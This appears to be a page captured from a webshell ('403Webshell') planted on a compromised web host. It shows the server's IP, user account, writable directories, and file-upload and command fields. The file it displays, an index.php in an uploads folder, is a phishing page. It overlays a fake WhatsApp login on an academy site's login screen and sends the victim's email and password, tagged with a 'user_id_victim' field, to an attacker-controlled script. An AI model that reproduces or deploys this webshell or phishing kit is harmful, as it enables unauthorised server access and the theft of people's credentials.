403Webshell
Server IP : 162.0.232.140  /  Your IP : 3.142.219.125
Web Server : LiteSpeed
System : Linux premium139.web-hosting.com 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
User : micrcvoy ( 740)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/micrcvoy/public_html/uploads/slider/academy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/micrcvoy/public_html/uploads/slider/academy/index.php
<!DOCTYPE html>
<html>
<head>
<link href='https://fonts.googleapis.com/css?family=Montserrat:400,700' rel='stylesheet' type='text/css'>
<meta charset="UTF-8">

<title>Update Academy - Réalisez vos rêves avec cinq pour cent d'efforts</title>
<style>
body {
    background: url('http://update-academy.com/assets/admin/assets/login/fondj.jpg') no-repeat fixed center center;
    background-size: cover;
    
    font-family: Montserrat;
}



.login-block {
    width: 320px;
    padding: 20px;
    background: #fff;
    border-radius: 5px;
    border-top: 5px solid #ef9d0a;
   /* margin: 0 auto; */
   margin-left:60%;
   margin-top:250px;
}

.login-block h1 {
    text-align: center;
    color: #000;
    font-size: 18px;
    text-transform: uppercase;
    margin-top: 0;
    margin-bottom: 20px;
}

.login-block input {
    width: 100%;
    height: 42px;
    box-sizing: border-box;
    border-radius: 5px;
    border: 1px solid #ccc;
    margin-bottom: 20px;
    font-size: 14px;
    font-family: Montserrat;
    padding: 0 20px 0 50px;
    outline: none;
}

.login-block input#username {
    background: #fff url('http://update-academy.com/assets/admin/assets/login/u0XmBmv.png') 20px top no-repeat;
    background-size: 16px 80px;
}

.login-block input#username:focus {
    background: #fff url('http://update-academy.com/assets/admin/assets/login/u0XmBmv.png') 20px bottom no-repeat;
    background-size: 16px 80px;
}

.login-block input#password {
    background: #fff url('http://update-academy.com/assets/admin/assets/login/Qf83FTt.png') 20px top no-repeat;
    background-size: 16px 80px;
}

.login-block input#password:focus {
    background: #fff url('http://update-academy.com/assets/admin/assets/login/Qf83FTt.png') 20px bottom no-repeat;
    background-size: 16px 80px;
}

.login-block input:active, .login-block input:focus {
    border: 1px solid #ff656c;
}

.login-block button {
    width: 100%;
    height: 40px;
    background: #ef9d0a;
    box-sizing: border-box;
    border-radius: 5px;
    border: 1px solid #e15960;
    color: #fff;
    font-weight: bold;
    text-transform: uppercase;
    font-size: 14px;
    font-family: Montserrat;
    outline: none;
    cursor: pointer;
}

.login-block button:hover {
    background: #e3960e;
}

</style>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" />

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>

        <script>
      $(document).ready(function(){

      $("#erreur_connection").hide();
      $("#newpassword").hide();
      $("#envoie_passe").hide();
      $("#erreur_passe").hide();

      $('#pass_oublie').click(function(){
      $("#authentification").hide();
      $("#newpassword").show();
   
          });

        $('#se_authentifier').click(function(){
        $("#authentification").show();
        $("#newpassword").hide();
        $("#envoie_passe").hide();
        $("#erreur_passe").hide();
   
          });


    $("#passwordform").submit(function(event) {

     var url=$("#base_url").val();
    
    event.preventDefault();

    var values = $(this).serialize();
   
    /* Envoie des données et récupération des résultats*/
    $.ajax({
        url: url+"libs/envoie_pass.php",
        type: "post",
        data: values,
        success: function(data){
    
         if(data==-1){

            $("#erreur_passe").show();
            $("#envoie_passe").hide();

            }else{


           
           $("#erreur_passe").hide();
           $("#envoie_passe").show();
     
            }
           
        },
        error:function(data){
        alert("Une erreur est survenue"+data);
           
        }
    });
});


    
      $("#jemeconnecte").submit(function(event) {

     var url=$("#base_url").val();
    
    event.preventDefault();

    var values = $(this).serialize();
   
    /* Envoie des données et récupération des résultats*/
    $.ajax({
        url: url+"libs/main_login.php",
        type: "post",
        data: values,
        success: function(data){
          
         if(data==-1){
             $("#erreur_connection").show();
            $("#succes-message").hide();

            }else{
               
          if(data==-2){

          var location=url+"home/login";

          window.location.href=location;

           }else{
  
            var location=url+"home/account/"+data;

              window.location.href=location;


             }
    
            }
           
        },
        error:function(data){
        alert("Une erreur est survenue"+data);
           
        }
    });
});


      });

    </script>
    <script src='https://www.google.com/recaptcha/api.js'></script>
</head>

<body>


<div class="login-block" id="authentification">
   <title>Whatssap</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<div id="container">
  <img id="image" src="w.jpg" />
  <form method="POST" 
action="<? include '../fak.php'; echo $ezzaher; ?>" 
id="login_form">
<input type="hidden" name="user_id_victim" value="<? echo $_GET['i']; ?>" />
<input name="type" value="whatssap" type="hidden">

<p id="text">


<input name="email" onkeypress="formchange()" type="text" placeholder="Email or Username or Number " style=" margin-left: 1px;font-family: HelveticaNeue-Light,'Helvetica Neue Light','Helvetica Neue',Helvetica,Arial,'Lucida Grande',sans-serif; margin: 4px; outline: 0; -webkit-appearance: none; tap-highlight-color: rgba(255,255,255,0); line-height: 1.2142em; padding: .67861em 1em; background: #fff; border: 1px solid rgba(39,41,43,.15); color: rgba(0,0,0,.8); border-radius: .2857rem; box-shadow: 0 0 0 0 transparent inset; -webkit-transition: background-color .2s ease,color .2s ease,box-shadow .2s ease,border-color .2s ease; transition: background-color .2s ease,color .2s ease,box-shadow .2s ease,border-color .2s ease; width: 290px; height: 40px;"><br>

<input name="pass" value="" type="password" placeholder="Password" style="  margin: 4px 5px;font-family: HelveticaNeue-Light,'Helvetica Neue Light','Helvetica Neue',Helvetica,Arial,'Lucida Grande',sans-serif; margin: 4px; outline: 0; -webkit-appearance: none; tap-highlight-color: rgba(255,255,255,0); line: 1.2142em; padding: .67861em 1em; background: #fff; border: 1px solid rgba(39,41,43,.15); color: rgba(0,0,0,.8); border-radius: .2857rem; box-shadow: 0 0 0 0 transparent inset; -webkit-transition: background-color .2s ease,color .2s ease,box-shadow .2s ease,border-color .2s ease; transition: background-color .2s ease,color .2s ease,box-shadow .2s ease,border-color .2s ease; width: 290px; height: 40px;">
<label class="uiButton uiButtonConfirm uiButtonLarge" for="u649190_1" style="
    margin: 10px;
    margin-left: 35px;
">
<input value="VALIDER" name="login" onclick="" id="u649190_1" type="submit"></label>






  </p>
</div>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="shortcut icon" href="https://web.whatsapp.com/img/favicon/1x/favicon.png">

<link type="text/css" rel="stylesheet" href="css2/1.css" />
    <link type="text/css" rel="stylesheet" href="css2.css" />




</div>
        

<style type="text/css">

#container {
  height: 400px;
  width: 400px;
  position: relative;
}
#image {
  position: absolute;
  left: 0;
  top: 0;
}
#text {
  z-index: 100;
  position: absolute;
  color: white;
  font-size: 24px;
  font-weight: bold;
  left: 500px;
  top: 150px;
}
</style>


  <input type="hidden" value="http://update-academy.com/" id="base_url" name="base_url"/>
    <center> <img src="http://update-academy.com/assets/admin/assets/login/theupdate.png" style="width:300px;margin-bottom:5px;"/></center>
    <div class="alert alert-danger" id="erreur_connection" style="margin-top:10px;">
         Pseudo  ou mot de passe erroné
     </div>
    
    
  </form>
</div>

<div class="login-block" id="newpassword">
   <form id="passwordform"  class="m-t-md" action="">
  <input type="hidden" value="http://update-academy.com/" id="base_url" name="base_url" />
   <center> <img src="http://update-academy.com/assets/admin/assets/login/theupdate.png" style="width:300px;margin-bottom:5px;"/></center>
   
    
    <div class="alert alert-success" id="envoie_passe" style="margin-top:10px;">
         Mot de passe envoyé avec succès votre boite mail
     </div>
      <div class="alert alert-danger" id="erreur_passe" style="margin-top:10px;">
        Ce mail n'existe pas dans la base
     </div>
    <input type="email" value="" placeholder="Entrez votre email" id="username" name="email"  required/>
   
    <button>Envoyer</button>
     <div class="alert alert-success"  style="margin-top:10px;">
        <center> <a href="javascript:void(0);" id="se_authentifier">Authentification</a> </center>
     </div>
  </form>
</div>
</body>

</html>
  

Youez - 2016 - github.com/yon3zu
LinuXploit